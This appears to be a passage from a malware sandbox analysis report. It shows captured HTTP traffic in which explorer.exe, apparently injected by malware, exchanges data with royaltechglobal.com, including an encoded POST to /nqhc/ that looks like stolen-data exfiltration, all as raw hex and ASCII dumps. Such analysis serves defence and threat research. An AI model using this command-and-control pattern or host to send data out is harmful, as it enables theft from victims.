                                                                                                                                                                          Data Ascii: 7nWHV=cCD7hmI-Mx(giWHf4G20pVah(zvDDh9nhvrEoXgM5Hu4hQJd8-9TVZhyK-3r~eE-XsqXJDNhb9A5shXm(jgLkKadI2oj58hHIphSrJ4BAwpGkjuq~ZQZE1yk6Bn7xmO8DOk3k6QlgR0Eg8z7YOzTuzm6EyfrD9Mcp4HFatEMOSG8JOGWBqSQfYeM042HqPY2DH7MDa4Mc-Sptp~ctMQrlOuIrdfUNe602aTMyuzT(9J3TEp1xqbyDt(RpoZ4~Hc8RdRm4WM9Jiaz0MCPo3j9Bw~awVvSmUo6Rz2-gTSF7FrqWQUFrmCDT04A6d(D1jTG6JeLjMAYJY1l7cgzbtLGgrQ0cvCDhj2hWbLBr-mEJDpKLesPfH8LtUJfqp3aKnBJIh(OfjHU~PuPfiDO4RsICE4dcIOQQWMHTb1xZFNcr37rKSz5ANSX7zFfn6kY3dXwQSnzzQcYbWMwbX(wl3W5lcvS55QyC1ZwjTdCH_MUHVmpbnCSpn9HUc63CaNSNFKTS4wBfso.
                                                                                                                                                                          Dec 5, 2022 15:15:28.337711096 CET11234INHTTP/1.1 404 Not Found
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:15:28 GMT
                                                                                                                                                                          Server: Apache
                                                                                                                                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                          Link: <https://royaltechglobal.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                                                          Connection: Upgrade
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                          X-Endurance-Cache-Level: 2
                                                                                                                                                                          X-nginx-cache: WordPress
                                                                                                                                                                          Content-Length: 13070
                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                          Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 72 6b 73 db c6 b2 ed 67 a9 ea fe 87 31 5c 89 a4 2d 02 20 f8 d0 83 22 99 63 2b ce e3 1c 3b ce b1 9c 9d bb 4f 9c 52 0d 80 26 30 d6 60 06 99 19 90 62 74 f4 df 6f 0f 00 be 24 8a 62 64 67 a7 ea ee 4d 5b e4 4c 4f f7 ea d5 ab 57 ff d9 d7 6f cf df ff e3 c7 57 24 35 19 1f ee ee f6 ed 2f 89 99 1a 38 dc 28 87 70 2a 92 81 03 c2 fd e9 c2 d9 dd c9 15 8c d8 f5 c0 91 49 0f 0b 4c ae 7b be 2f 93 dc cb c0 17 fa b9 43 10 60 a7 9f 02 8d 87 bb 3b 84 ec f4 33 30 94 44 29 55 1a cc c0 f9 e9 fd 37 ee 89 b3 fc 24 68 06 03 67 cc 60 92 4b 65 1c 12 49 61 40 60 ea 84 c5 26 1d c4 30 66 11 b8 e5 a5 ae db dd d9 e9 3f 73 5d f2 82 73 c2 04 79 2b 80 5c bc 7a 4b 3a 5e cb 3b f6 02 e2 12 ca a4 06 e9 45 32 23 ae 3b b4 e9 4b 9d 94 0c a5 d1 4b 7d 84 64 22 86 6b 87 f8 77 53 13 10 a0 a8 91 6a 29 fb 4e d3 fd 17 df bf c5 df 83 79 f7 19 8c 8e 14 cb 0d 31 d3 1c 81 68 9e 73 16 51 c3 a4 f0 79 7c f8 51 4b 81 90 9c 6a 8d 6f 25 59 57 47 29 64 d4 4e b8 b3 73 e3 fc 47 d9 ef da 38 3d a7 d2 f8 83 ff c1 af 52 3c a9 12 a7 e1 fc 47 a2 68 9e 3a bd 5f 30 d9 36 c1 cc 97 0a 55 8f 54 91 85 af 99 36 36 87 c5 2b 00 4a 4e 29 37 10 a5 09 97 21 e5 56 a0 0f be f8 2d 8d 3e f8 cf c3 79 31 af 8a 99 81 cc e2 bc e2 90 e1 e4 2b 9d 6c fc 7b 7c df b6 c7 73 be 28 c8 a5 66 56 08 a7 17 54 4d 9c de 02 f8 67 08 7f a4 09 6c 8b 8b 79 76 53 98 f8 9d cc 6c 55 a1 f8 16 55 b7 58 86 e2 96 84 b6 d5 67 3e c1 6d e3 e9 3a dc c5 5a 56 a3 f5 c9 6a 54 e8 0b 4d 7e 90 86 7c 23 0b 11 6f 2b 4c 0d 80 f2 e4 0a c6 4c 16 7a 3b 89 96 c4 f9 75 59 9e b7 2a a1 82 fd 5e fa 7e 6b ab c8 d5 a2 7a 96 77 36 97 bc c7 64 f2 6d 99 bd f5 b2 1b 0e 97 89 5c 96 f5 fb 0c 45 7d 1b 7e 84 c8 6c 8b 32 c9 dd 48 0a 03 c2 7c f0 8b 9c 4b 1a eb 0f 7e ab d9 6a 7d f0 83 e0 83 1f 29 99 e7 10 bb af b1 d3 1b 7a a5 dc c0 cb 45 f2 a4 91 2d 04 16 4e 58 6c 52 34 45 a7 d9 70 52 60 49 6a 9c 5e a7 8d 9b 61 96 7c 39 cd d3 a0 6f 97 17 f4 24 83 3d 9f 40 98 57 55 7f c4 55 48 5d bc a6 22 29 4a fe 0e 08 f7 a7 0b 1b d4 3f 52 65 de 8e b6 1f 09 db 6b 66 c0 da 34 54 40 e3 48 15 59 b8 75 79 3d c3 a2 d2 7a f7 9e 2a 17 b6 c1 b6 eb 9b 11 da de 91 1b 4c bd 56 a4 bc b0 34 53 50 4f 5b 3c 8e f7 eb ed ee ce 4e df d7 91 62 b9 19 da f3 33 d7 25 2f 38 27 4c 90 b7 02 c8 c5 ab b7 c4 75 87 bb bb bb d5 d3 fb 94 69 62 c7 22 f8 2b 73 c3 32 f6 3b c4 64 c2 4c 4a 4c 0a e4 1f 92 6a 53 56 e5 bc 48 10 64 1c 9c 7a 41 40 5c 52 31 f3 fd a9 cd b0 6c fc 89 54 71 ae 40 6b bf ca d5 be 06 e9 97 ed 76 fa 86 19 0e 43 6b 43 22 a4 21 23 59 88 18 51 ee 69 d3 f7 ab 4c 2c c9 c0 50 92 2b 99 83 32 d3 81 23 93 1e 97 11 e5 e0 90 48 0a 03
                                                                                                                                                                          Data Ascii: rksg1\- "c+;OR&0`bto$bdgM[LOWoW$5/8(p*IL{/C`;30D)U7$hg`KeIa@`&0f?s]sy+\zK:^;E2#;KK}d"kwSj)Ny1hsQy|QKjo%YWG)dNsG8=R<Gh:_06UT66+JN)7!V->y1+l{|s(fVTMglyvSlUUXg>m:ZVjTM~|#o+LLz;uY*^~kzw6dm\E}~l2H|K~j})zE-NXlR4EpR`Ij^a|9o$=@WUUH]")J?Rekf4T@HYuy=z*LV4SPO[<Nb3%/8'Luib"+s2;dLJLjSVHdzA@\R1lTq@kvCkC"!#YQiL,P+2#H
                                                                                                                                                                          Dec 5, 2022 15:15:28.337759972 CET11236INData Raw: c2 0c 50 b9 4b 54 8e f8 eb d3 4b a4 a5 ec c7 bb 3f 08 65 25 ba 2c f7 b9 80 7b a8 ba 52 9f 58 9b 0d 1c 9a e7 9c 45 e5 7e 7c 1e 1f 7e d4 b8 27 12 71 aa f5 c0 29 a5 73 75 94 42 46 dd 44 d1 3c 75 86 b8 f8 b2 c1 b5 99 6f df f7 ab 14 0f 97 6d dd 5a 65
                                                                                                                                                                          Data Ascii: PKTK?e%,{RXE~|~'q)suBFD<uomZe~y:<MC5^dUQ"@f~h8LNx%(0h!95FTvb"t~+@M]&.CoS~ska5IF.vy%W+6lcmre#DV
                                                                                                                                                                          Dec 5, 2022 15:15:28.337796926 CET11237INData Raw: ef 07 bd 7d cc 30 86 46 69 99 b4 ef 48 51 3f 1f d8 de ab 2f 25 3b 6d a8 81 28 a5 22 01 a7 b1 44 de 89 64 96 73 30 e0 0c 06 03 5a 4d 72 61 73 ed 62 ee ce 75 70 d0 d8 07 2b bf 2c 54 04 ff fb bf 37 b7 07 5e 24 45 84 e9 d6 ba 5f 45 48 6b e9 7e d0 03
                                                                                                                                                                          Data Ascii: }0FiHQ?/%;m("Dds0ZMrasbup+,T7^$E_EHk~o/Lo{n'LreTd8A{uKg}_Gffi#.vu8L!7;19a30g;T1SH&]J&iz9"]
                                                                                                                                                                          Dec 5, 2022 15:15:28.337833881 CET11238INData Raw: 0b dc 1e 83 94 c7 25 a4 2d cb 2a de 38 08 fa 6e da ab 3d 50 96 3d b2 8a 8c 19 37 2c 90 a5 58 16 b3 65 d5 9c a1 3d 0a a3 e0 b7 82 29 88 5d eb b4 b5 24 e6 76 3a cb 69 1c 33 91 2c 3c 5e 8a dc f4 da 9b d7 25 c5 85 e5 aa 35 43 a2 29 b0 24 35 25 c4 13
                                                                                                                                                                          Data Ascii: %-*8n=P=7,Xe=)]$v:i3,<^%5C)$5%M;bJhEESqFQGReP[4l"j,(#hSrcT,o=%'gt/a@5:[W-A9u(Uf%g,I.UOb5.vQEcV^Fht(YFn7n8=!
                                                                                                                                                                          Dec 5, 2022 15:15:28.337872982 CET11240INData Raw: b5 4f 36 a4 9c 60 4a d7 6b 1e d9 94 db de 24 05 05 fb 1e d3 28 c4 54 16 c6 1d 71 b8 3e b8 49 68 6e 07 ea da 9c 50 c6 53 b2 92 21 27 64 48 3c ca 59 22 38 8c cc 0d 46 28 5a d8 9e cf 32 d4 93 09 97 09 ce 70 ed da 50 85 2f cd 3b 61 10 31 8e f2 28 b8
                                                                                                                                                                          Data Ascii: O6`Jk$(Tq>IhnPS!'dH<Y"8F(Z2pP/;a1(bI:G//-G#M]i-$XKe+IH!$Z+.Xmf!];aI{dLNrrpr28ppgVlbi_&f:{9(>+)@{
                                                                                                                                                                          Dec 5, 2022 15:15:28.337933064 CET11241INData Raw: ca 1f 3e a2 87 17 9c 86 87 6f 45 75 e7 85 a2 75 31 5e 85 91 c2 fe aa 28 65 a8 91 d1 87 5f d3 02 9d 0d 6a 16 1d 4b cc 0e ca 56 81 6d d5 3a 6f 95 97 56 75 69 97 97 76 75 59 62 d4 3a ef 96 97 6e 75 39 2a 2f 47 d5 e5 b8 bc 1c 57 97 93 f2 72 52 5d 4e
                                                                                                                                                                          Data Ascii: >oEuu1^(e_jKVm:oVuivuYb:nu9*/GWrR]Ni=b\sKT[AP~NjD>4:L*fe',T?nK*PKYH\2KfqR^@DL,tr|~NC&hs'YP2mT
                                                                                                                                                                          Dec 5, 2022 15:15:28.337971926 CET11242INData Raw: 7b 24 83 98 d1 c1 1e e5 7c 8f f8 c3 dd 3e 67 e2 8a e0 4e 06 7b 1a 9d 0e 3a 05 30 7b 84 c5 83 bd f1 c4 8d a9 ba 72 43 2e a3 2b b7 7c 75 4b 88 54 c1 68 b0 97 1a 93 f7 7c 5f c9 29 e5 06 a2 34 e1 32 a4 dc 8b 64 e6 4f 72 37 92 c2 80 30 be 49 21 03 ed
                                                                                                                                                                          Data Ascii: {$|>gN{:0{rC.+|uKTh|_)42dOr70I!X>LV{xOSc@]O0|B)63?aT31.Q(AJL5;HP^Gf(;)A"{sY&f:tR-i+r+\8c
                                                                                                                                                                          Dec 5, 2022 15:15:28.338022947 CET11244INData Raw: 0f 95 49 ac 91 87 ff 3f fb fd df 56 0f b6 f6 76 b0 b5 99 83 7f bb f7 9f e2 de bc 50 39 07 77 0a 1c ab fe 55 1d ec 75 3b a7 cd e0 f4 a8 79 7c d2 69 db a6 de e9 c9 49 ab dd 6d 9d 76 82 e0 f8 a8 fb f9 fd ed 1d 23 6e e7 b8 d9 2d fb b4 b1 63 6b 85 c3
                                                                                                                                                                          Data Ascii: I?VvP9wUu;y|iImv#n-ck8A_\24&ZB*oS9Dj0Q_:=L&Ifip&/MZZ><dTh;Qq"%E yh31,d7#4?cP#
                                                                                                                                                                          Dec 5, 2022 15:15:28.338072062 CET11245INData Raw: aa 11 bb c6 e9 0b 5e 91 c5 b0 1b 2c ac 5c 27 d4 fb b9 2c 19 f7 39 5b e4 22 df cc 0d ba 0b a2 b3 20 59 3c 9b 69 0e 6e 54 68 23 97 a3 32 fc 08 91 b9 1f 47 b0 61 9f 92 54 c1 08 ed 64 4c ae 7b be af e4 94 72 03 51 9a 70 19 52 ee 45 32 73 86 df c9 0c
                                                                                                                                                                          Data Ascii: ^,\',9[" Y<inTh#2GaTdL{rQpRE2s>p6]CqZ3iEx4q;H~YV[04yW|V'[2f4Gx$ohd+6+8dvWp,1Ic#rK7#F\j GCj
                                                                                                                                                                          Dec 5, 2022 15:15:28.338109016 CET11246INData Raw: 26 ed fb d5 6b 99 7d 27 75 6f 93 75 5b cd 56 cb 0f 02 7f 6f 48 7e 90 63 c8 42 50 c4 c6 c8 12 e2 1f 86 6b 5a b8 b7 91 91 9f 03 ad 79 6a d1 2e 20 37 9f 87 5d f3 c4 e2 bd 28 92 42 9b 4f 07 3b b6 60 ff 59 f0 e9 a7 43 1d 55 50 02 3e 1d aa 6b a1 de d0
                                                                                                                                                                          Data Ascii: &k}'uou[VoH~cBPkZyj. 7](BO;`YCUP>k@S+?]BB}]/})b9?1p?_BYr3J2 08>q,6CvwfxDyJEyATs@g#
                                                                                                                                                                          Dec 5, 2022 15:15:28.452188969 CET11247INData Raw: e4 a1 db 76 96 11 77 ca 82 f9 08 f9 54 d9 11 49 24 85 a1 0c 07 75 d6 b0 ca 67 f9 59 e8 36 9d 21 ea 5e 8a 3c d3 78 32 99 78 e3 09 1a 21 03 5d 0a 5c 1d fd 91 02 70 63 aa ae dc 89 54 71 ae 40 6b b7 7c f2 89 a1 2a 01 33 d8 bb 0c 39 15 57 7b c3 af 31
                                                                                                                                                                          Data Ascii: vwTI$ugY6!^<x2x!]\pcTq@k|*39W{1Y?,f\^q}n<k#%9/rb#\JrWl,*\?.JHS^-rWXzD,7LsYG:Uti/$I]"q?j#g


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          13192.168.11.2049849192.185.32.15780C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:15:30.234698057 CET11254OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.royaltechglobal.com
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 51815
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.royaltechglobal.com
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.royaltechglobal.com/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 63 43 44 37 68 6d 49 2d 4d 78 28 67 69 57 48 66 34 47 32 30 70 56 61 68 28 7a 76 44 44 68 39 6e 68 76 72 45 6f 58 67 4d 35 48 6d 34 68 69 42 64 39 5a 52 54 61 35 68 79 4a 2d 33 71 7e 65 45 5a 58 6f 4f 54 4a 44 51 63 62 5f 49 35 74 32 7a 6d 28 51 49 4c 79 61 61 41 48 57 6f 68 6f 73 67 45 49 70 39 4f 72 4a 39 38 48 44 31 47 6c 67 32 71 70 65 45 65 48 6c 79 59 36 42 6e 33 6d 32 4f 30 44 50 51 6e 6b 36 4d 6c 67 53 41 45 76 76 62 37 61 64 62 54 30 7a 6d 35 52 69 65 72 4e 64 4e 6b 70 34 44 52 61 74 45 79 4f 51 71 38 4a 4f 6d 57 43 74 7e 58 52 59 65 4d 33 34 32 49 75 50 45 36 44 47 58 45 44 61 4d 4d 63 2d 36 70 74 4a 7e 63 6f 74 51 73 78 2d 75 4b 76 64 65 63 65 4f 6d 43 32 61 58 69 79 76 48 54 7e 4e 64 33 53 7a 46 31 39 76 37 79 64 64 28 50 6d 49 5a 6e 78 6e 63 67 52 62 78 51 34 57 73 4c 4a 6c 61 7a 30 74 69 50 75 53 50 2d 43 51 7e 63 28 31 76 48 77 6b 6b 32 52 77 66 6e 67 54 54 65 37 45 66 71 57 6a 63 46 73 6a 69 41 51 6b 34 48 76 4e 28 53 37 44 66 32 36 4a 44 47 6a 4e 6f 79 4a 62 5a 6c 37 38 67 7a 4c 63 4c 42 71 62 51 7a 44 66 43 64 7e 7a 32 50 57 62 48 33 72 5f 79 2d 4a 54 46 4b 4e 75 38 50 49 6e 38 49 72 30 4a 62 77 5a 32 51 4f 6e 42 4a 49 68 7a 77 66 69 37 55 7e 64 75 50 4f 43 7a 4f 39 43 45 49 46 30 34 62 63 49 50 65 51 57 77 4b 54 62 4e 66 5a 45 38 4a 72 78 6a 72 4c 48 66 35 42 4f 4b 55 72 7a 45 30 6a 36 6b 4c 7a 64 54 6a 51 53 72 72 7a 51 4d 49 62 6b 49 77 61 58 76 77 68 33 57 36 33 4d 76 56 70 5a 51 6f 50 56 46 57 6a 54 42 38 48 5f 4a 4a 48 58 6d 70 65 47 6a 57 35 6d 31 4e 41 75 69 42 4d 4e 6b 62 44 33 71 69 44 34 55 79 42 72 62 56 38 65 36 6b 55 61 49 30 37 47 68 61 46 58 4b 6f 49 48 57 72 58 44 37 62 54 6e 65 57 54 34 42 76 66 57 46 76 79 42 75 73 50 4d 64 74 57 53 44 42 38 6c 48 32 56 46 6c 74 7e 67 42 75 59 70 6e 53 7a 46 72 68 47 38 76 43 54 72 36 50 66 33 76 36 4a 30 76 39 69 41 32 37 39 6f 33 56 57 54 4e 4f 64 72 6a 43 34 72 64 6d 55 47 30 38 4d 59 4b 76 73 75 51 48 6e 30 74 39 35 2d 45 38 57 51 45 5a 5a 39 6b 48 45 6f 41 6e 56 68 54 73 56 6e 69 52 37 37 72 45 58 42 45 56 4a 52 65 76 52 63 4c 33 58 61 58 31 39 4a 39 4e 36 53 4e 4f 74 6a 38 68 71 2d 4f 38 5a 64 6d 48 38 4c 79 59 4b 73 77 76 4a 50 61 72 46 73 45 50 6f 64 37 44 71 6c 58 73 36 6e 4d 38 39 77 45 4a 62 6a 36 36 77 42 61 33 49 4c 37 73 35 34 4b 66 71 36 4b 69 31 32 73 37 63 31 74 55 73 51 51 4c 48 4c 4e 71 36 67 7a 61 43 4c 66 55 39 6d 4e 45 75 45 52 55 5a 5a 4e 50 30 76 36 73 32 50 43 46 51 55 59 41 63 6c 36 4e 58 65 6a 41 4b 67 34 72 75 42 63 34 50 51 28 37 36 45 59 52 41 39 56 65 36 66 34 58 49 4a 74 56 48 34 7a 6f 55 37 61 49 28 39 76 4d 28 39 34 72 71 2d 49 70 65 72 42 6d 50 7a 31 4d 4b 65 54 67 71 68 62 76 55 64 31 38 4b 46 71 79 4e 52 64 51 46 6a 76 50 4e 7a 47 56 44 32 36 32 45 30 48 7a 32 5a 75 49 30 43 37 64 63 41 4b 49 78 68 30 56 30 53 55 77 6c 58 78 4d 36 42 6c 75 33 48 4a 51 7e 33 71 76 72 46 4a 32 50 73 4f 51 4b 56 4b 45 38 54 69 33 57 62 46 48 74 39 58 52 7a 2d 39 33 79 2d 6c 6e 75 46 30 4e 63 64 54 64 47 6c 4e 78 55 5a 32 49 76 58 74 66 4f 58 28 4d 28 62 70 61 66 76 32 35 39 64 57 79 4e 45 70 62 68 77 63 68 54 5f 28 74 43 72 4a 35 67 44 36 47 42 37 67 4c 44 2d 4f 5f 73 4c 72 37 65 4f 39 43 56 52 5a 37 36 4c 69 67 52 31 46 43 4f 53 59 56 48 71 75 59 54 38 58 5a 32 39 42 72 42 58 47 42 4a 30 34 30 48 47 77 4b 6a 5f 47 52 45 6b 70 63 5a 53 28 56 6f 6e 7a 66 6f 4e 39 55 7e 6a 79 6f 6f 42 62 5f 54 6a 4a 67 63 77 62 77 30 7a 63 68 7a 5a 73 41 73 65 74 2d 71 34 59 79 7e 33 65 41 72 48 6b 56 51 76 6a 65 45 4c 76 4f 71 68 47 4c 6a 4b 50 45 4c 35 73 37 67 30 47 6f 6d 2d 51 4d 66 44 50 38 41 51 6d 67 73 4b 66 51 6f 36 32 65 68 76 7e 75 56 43 7a 77 58 55 62 68 6a 78 69 68 6a 67 6e 6f 5a 58 4f 31 79 31 6a 43 4a 43 4d 46 5a 55 7a 71 52 39 71 6f 4f 42 37 32 53 59 4e 62 6d 69 47 56 38 33 7a 36 43 52 48 6e 62 58 4e 47 51 54 4e 37 4f 48 76 6a 70 58 31 55 61 76 30 31 48 30 55 64 28 4d 77 6e 76 6e 39 47 30 45 57 6d 64 33 47 35 33 59 44 50 41 63 34 51 73 4a 4f 34 30 55 48 45 77 69 53 56 43 44 37 68 61 42 77 76 4e 70 36 45 31 58 49 6e 71 73 72 36 50 6a 61 44 69 61 59 56 6f 4b 75 71 79 77 39 50 7e 63 31 7a 6e 37 4a 69 31 4a 46 75 58
                                                                                                                                                                          Data Ascii: 7nWHV=cCD7hmI-Mx(giWHf4G20pVah(zvDDh9nhvrEoXgM5Hm4hiBd9ZRTa5hyJ-3q~eEZXoOTJDQcb_I5t2zm(QILyaaAHWohosgEIp9OrJ98HD1Glg2qpeEeHlyY6Bn3m2O0DPQnk6MlgSAEvvb7adbT0zm5RierNdNkp4DRatEyOQq8JOmWCt~XRYeM342IuPE6DGXEDaMMc-6ptJ~cotQsx-uKvdeceOmC2aXiyvHT~Nd3SzF19v7ydd(PmIZnxncgRbxQ4WsLJlaz0tiPuSP-CQ~c(1vHwkk2RwfngTTe7EfqWjcFsjiAQk4HvN(S7Df26JDGjNoyJbZl78gzLcLBqbQzDfCd~z2PWbH3r_y-JTFKNu8PIn8Ir0JbwZ2QOnBJIhzwfi7U~duPOCzO9CEIF04bcIPeQWwKTbNfZE8JrxjrLHf5BOKUrzE0j6kLzdTjQSrrzQMIbkIwaXvwh3W63MvVpZQoPVFWjTB8H_JJHXmpeGjW5m1NAuiBMNkbD3qiD4UyBrbV8e6kUaI07GhaFXKoIHWrXD7bTneWT4BvfWFvyBusPMdtWSDB8lH2VFlt~gBuYpnSzFrhG8vCTr6Pf3v6J0v9iA279o3VWTNOdrjC4rdmUG08MYKvsuQHn0t95-E8WQEZZ9kHEoAnVhTsVniR77rEXBEVJRevRcL3XaX19J9N6SNOtj8hq-O8ZdmH8LyYKswvJParFsEPod7DqlXs6nM89wEJbj66wBa3IL7s54Kfq6Ki12s7c1tUsQQLHLNq6gzaCLfU9mNEuERUZZNP0v6s2PCFQUYAcl6NXejAKg4ruBc4PQ(76EYRA9Ve6f4XIJtVH4zoU7aI(9vM(94rq-IperBmPz1MKeTgqhbvUd18KFqyNRdQFjvPNzGVD262E0Hz2ZuI0C7dcAKIxh0V0SUwlXxM6Blu3HJQ~3qvrFJ2PsOQKVKE8Ti3WbFHt9XRz-93y-lnuF0NcdTdGlNxUZ2IvXtfOX(M(bpafv259dWyNEpbhwchT_(tCrJ5gD6GB7gLD-O_sLr7eO9CVRZ76LigR1FCOSYVHquYT8XZ29BrBXGBJ040HGwKj_GREkpcZS(VonzfoN9U~jyooBb_TjJgcwbw0zchzZsAset-q4Yy~3eArHkVQvjeELvOqhGLjKPEL5s7g0Gom-QMfDP8AQmgsKfQo62ehv~uVCzwXUbhjxihjgnoZXO1y1jCJCMFZUzqR9qoOB72SYNbmiGV83z6CRHnbXNGQTN7OHvjpX1Uav01H0Ud(Mwnvn9G0EWmd3G53YDPAc4QsJO40UHEwiSVCD7haBwvNp6E1XInqsr6PjaDiaYVoKuqyw9P~c1zn7Ji1JFuXIxkCnk1E9qSQU5c911oQ_RtGZge4UnWli~FUKNzEj38xueZnPN_iqr3ABEfQVVDSkosJTWILNFxdELG9NuObvpLBRKHsit8H9iI2iRPkNmScMT-O_WiE-RSLn35c0hc2-g5AdLPYszRMIMYOQn6lLysCm~qKKf_iwYCIDBNb9ONSoweWeiMgfExifGxRJNUKvhtU3qad1LgygiIJP~bLe00q6fWcAAxffaByh2NftaIIwO3l78rAznFtAiz24s-GerDpIvDViAMfOlrXw4mBZ8J(36E16~chqXZCLXc9exgYPxAac1qX3eNbPN02L0WGSUxJZSLUNVTVaenttuxzp~Xb9Nph6zy0av9EtwvF8nB8-mstN4WXYzknH21WjIpxrqihLhMcG3-6owcWuGFp7KzIVfheGjFWfaP~KGR4fvJ(xf9UzrJ2W(1PMv5Tle9eOHnh0ff7Ban(p3bAC~oNcU3p_Cv2w9lqElV(_4pfJlSe-qY7HSJbxEL3pFe4j1rVIwZutC6KKMcA5PGsf743_cywZZU2h~rQrqlqOjFDHi2uezk2w0T8ejeHiJyh88keJV0NulXIR7mXv7R68Gl246kaFy3Clf8M3VB5wqWAkWXuuzsQSpwxLOe7AdCJ-0Dx3FdHNsa1zpnBEKUy4SzW19vH7zHB5QUiH~fgzfWflgKjxxLlW6i42VXoF0mp2UHp6wOflIVpX0FYxk1bLXF~NVj(cX_oc32WwUr1VLb6OGOdvD4oxYHTWKYFEZvyC8F9gcVhh0ol_OlGZT1uy62TzUM4rWuA-KNm43qgCXlfN8RaztLThpXWA806o6NdwRTFX6WgzNMAoXACI~emCUDojGSeL3XyK97UD4-RxrsOJQABWuhabl37ZsLvnGin10LlrcvD9GW8IQ4A14Z1PeG76aSy8uDw5XodYaepbhfCMk_~nmDVE~AqqXNgXp60Ukwhxy1bdMnRjvw3uH_Kb(JRadaGh9nCHlA4nTJ5cA-zkTe6HqNSU4kF1f2p_E3vwRdFws37lmxXDmyDH7a(e0F7Vl5t5PS1GrD8m9QUwoun5IE4ID3KprR7TDq(UGIo-0WIqWKXVKwII89Dw924G~qA32QfCzRzra2dUkWYgGErwC_C5j8HNAWQjU-M6ONR_m-2JAiit0NU1zazbvsvczn6Hw7u1(mm_M_tMJvbmcrBA5uVs0Amxip~fSFtZ74PHomX4ueC2un(F1A4PvYQwD8xEBA8Xu_K4OPAOSPbwBi2-qp6mYa(i1QSqbJhxECDtsIJgVSVcm5sYxkXhGy4FrxF2fOzpInUV0zl6B-DF5DMV9lFJnsu0QnkCAc1It2syNGDQUcFm~sJ1UYswHrnHwSEf1lundys3siJI136-YBAx0hneHUGow7kRzXCFEjfsnYyZlwCAh7vb(epivaRIP5Mxf3(rJTtUS9ulw3l0~O6i(bOPGgg4Rwry9ixOLqOIu1pRl6CBUlJIUbgDIn7TI60FFjY9Yh~lOAIy42xSzRGpzExiUhKWmUg-XE6es8kHlYOLHP8cKF6TDXIRwu9xg_aKVoPFOsZdXUabi-HhLQTvcLFTDCDc95vXc9vTGt(zDHblvl0E5Xs2a0INHu94tAe788xTrBW35HsNBaU5AgPc8ybio8K62UYqUzuspuObO4qXGOe9omjektJpyvDEvFDCTnodEQoM(sLT87Z-3C4aMoO6yxauhiZP8fLiengjGcZIcLxGAU5GUaCbf-u0~9tTzrY6pIVygsDSINzH8Y0MxL0R70Ao2Qzdo0eSEDfgA7z0LtHZS5q93N1lA7duty8RuzEmTqCMfcYdiAdzUVfUhgpFWTbLeE(sz_FfQo0qwYpvb3Yi0ruRepdiUnTIWjgD9DxwrtdgoiwSEeCK5EDZME7ST7jJ0lGOD6fr3yUP4YTjblSQ~XuVzyq4m3mOk0Cxy-4YNV52yD7N9tpIWRjxifUYR-LFSv5cy7MnTOWErUkTXHHqR14XJFFxsntdMI2NgHBpr3(cj73-zUMDCd9-I_Tza7cIkXlpdwUQHziDwgbDykjIl6N72KTEp66UfyLO(z7BPhoy(-(1OCWGQwGZx6PPXaA1(WmHmZPR3SDDg75xVRlbJYQLNEnKgjwHQrlZF2iAeLoUQ6Hww0ViI1buMT9NDCP_MouFBrts801JRT7nzjY5sPoAJArqBZ(o6nbjKqdto31XSVi7LpQFNW(uzk3UlSHUrDIakW4v84kSSqvzXXBDDdvwDVCAIwB9A5A-C4Oye6sAiHdJVb4TZVVLHP5cYHAOX-HHrb9gj72gHUQbQViOuQKF1dg3T_65x5jDtmvQSYBUz5h71V3kV68ZCfk1cwjfGtizaicl93Mw0aK6Rm1CmKz9cLXaQqRayxY7GJQDYt9cGHlbjS3HB5JZuWNyRQgWuzwTLzxrLjrkjqvygNjuUnDSbUHV9yNbn64O54fBHHEkJAfx8pXdIdkGXLPnrZNHO_fZw3zRnYEBNA~yOJVTtVFd(mfFH3oHgZA1rRZnbw4tKvqi0ntrukBtg7xauViwo2KhzS8R5EbrOYKlIymKdcbcvp8COnthCgo3T72p3ynLRoieD3AOueRqDok7tiMj9ujvzGltXRbGGcOgx5Ghr5(MaMTL6JKoiTvhAHBwRm2dhvY95fLa2n3inPW69foYRQP-QIt_LMCi2Dlr2GQmbwPm~NFm9NOt9QwcgbXnSdOK18CIeo
                                                                                                                                                                          Dec 5, 2022 15:15:30.234812021 CET11260OUTData Raw: 72 58 73 64 32 32 64 28 6f 35 48 57 71 42 6c 36 63 79 50 4c 47 6e 31 45 55 63 7a 39 5f 4e 57 57 70 4d 76 74 5f 30 68 63 47 6f 45 4e 62 71 71 74 59 5a 5f 61 5a 28 52 53 6b 79 7a 62 6b 42 6d 6d 33 6d 67 57 65 31 7a 63 6c 36 51 50 59 61 30 42 6b 65
                                                                                                                                                                          Data Ascii: rXsd22d(o5HWqBl6cyPLGn1EUcz9_NWWpMvt_0hcGoENbqqtYZ_aZ(RSkyzbkBmm3mgWe1zcl6QPYa0BkeV8VMqP5jgYApgpl4DRKGlhnM9jIJTRudcUpj_F-TjzZIIAkI35Ljgo9qESsNHfh6041fKFpo0zjOBUxCjiYd_6-ri3MFDiUkEiCpYouEJMFb6fNtfye8PqKFtrWkSMa4U5Zxhta0FLuFjwgOE7APsL-lAy153xAMk
